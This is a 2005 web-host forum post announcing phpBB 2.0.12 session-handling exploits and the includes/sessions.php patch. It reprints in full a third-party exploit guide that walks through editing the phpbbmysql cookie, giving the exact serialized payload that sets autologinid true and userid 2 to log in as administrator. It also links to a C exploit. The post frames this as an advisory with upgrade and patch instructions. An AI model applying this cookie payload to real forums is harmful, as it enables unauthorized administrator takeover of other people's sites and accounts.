ewiget
Admin
Admin
| Posts: 171 |  |
Karma: 2
|
new phpbb exploits - 2005/03/04 23:01
PHPBB is a very popular message forum in which two new exploits and Proof of Concept (POC) code has began circulating. For this reason, we have manually upgraded all of our client sites that are running version 2.12 or lower, either the stand alone version or the one included with several CMS (Content Management Systems). The current version, which does not have the exploits is version 2.13.
You can download the version 2.13 if you do not already have this version installed from either the main PHPbb web site at http://www.phpbb.net or for the PHPNuke version at http://www.nukeresources.com
You can also manually patch your phpBB installation by modifying the includes/session.php file like this:
* in "includes/sessions.php" replace code:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
| Code: |
if( $sessiondata['autologinid'] == $auto_login_key )
|
replace with:
| Code: |
if( $sessiondata['autologinid'] === $auto_login_key )
|
----------------------------------
Exploit:
-----------------------------------
phpBB 2.0.12 Session Handling
Administrator Authentication
Bypass EXPLOIT -SIMPLIFIED-
- By PPC^Rebyte
-----------------------------------
03maa2005
** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **
[ ENGLISH VERSION ]
*** Status
__________
phpBB has already been informed about this exploit and has released a
'critical update' on 27 februari 2005, however most forums are still running
version 2.0.12 or lower.
VULNERABLE:
- 2.0.x --> 2.0.12
IMMUNE:
- 2.0.13 or newer
1* Intro
________
The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
for this bug.
Link to Paisterist's exploit at Packetstormsecurity:
http://packetstormsecurity.org/0503-exploits/phpbbsession.c
This program didn't work as it should on my pc, so I had to find out a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fool around
with it until it eventually still doesn't work (in my case).
This simplified manual method I'll describe can also be used for Internet
Explorer or other browsers instead of only Mozilla/Firefox.
2* The bug
__________
We're going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php
--> | Code: |
if( $sessiondata['autologinid'] == $auto_login_key )
|
3* Preparation
______________
1. Register at forum?
2. Log in with account
+ UNCHECK "Log in automatically"
3. Close browser to be sure a cookie is made.
4. Locate cookie
*firefox: X:Documents and SettingsNameApplication
DataMozillaFirefoxProfilesprofile.defaultcookies.txt
--> search the .txt for the domainname (domain.tld)
--> default cookiename = phpbbmysql
*iexplorer: X:Documents and SettingsNameCookiesName@domain.tld
--> default cookiename = phpbbmysql
4* Let's Xploit!
________________
Open the cookie in a text editor and search a line that resembles:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
| Code: |
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D
|
|
[ your 'user id' ] ____|
Replace this with:
| Code: |
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
|
|
[ 2 = 'user id' of admin ] ____|
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Save cookie and close.
Open your browser and surf to forum.
You'll now be automatically logged in having admin right 
5* Solution
___________
* Update phpBB to version 2.0.13
- or -
* in "includes/sessions.php" replace code:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
| Code: |
if( $sessiondata['autologinid'] == $auto_login_key )
|
replace with:
| Code: |
if( $sessiondata['autologinid'] === $auto_login_key )
|
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
6* Outro
________
THE.END
Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !
-- PPC^Rebyte --
-- ppc@respected.as -
Ed Wiget
Technical Support
http://www.xtremewebhosts.com |
